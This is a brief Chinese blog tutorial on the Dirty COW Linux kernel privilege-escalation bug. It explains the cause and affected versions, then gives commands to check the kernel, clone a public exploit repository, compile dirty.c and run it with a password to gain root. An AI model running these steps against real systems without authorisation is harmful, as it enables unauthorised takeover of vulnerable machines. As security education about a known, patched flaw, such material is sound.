脏牛提权

脏牛提权

漏洞原因

Dirty COW漏洞是一种发生在写时复制竞态条件漏洞。

详细分析参考链接

https://blog.csdn.net/hbhgyu/article/details/106245182

漏洞危害

低权限用户利用该漏洞技术可以在全版本Linux系统上实现本地提权

影响范围

Linux kernel 2.x through 4.x before 4.8.3

验证漏洞是否存在

使用uname -a命令查看linux内核信息,发现在脏牛漏洞范围内

image-20210714091603781

下载EXP

1
git clone https://github.com/Pa55w0rd/dirtycow.git

将c文件编译成可执行文件

1
gcc -pthread dirty.c -o dirty -lcrypt

执行./dirty 密码 命令,即可进行提权。

1
./dirty 密码

image-20210714091439210

本博客采用 知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议(CC BY-NC-SA 4.0) 发布.
Page View
2021-07-14
⬆︎TOP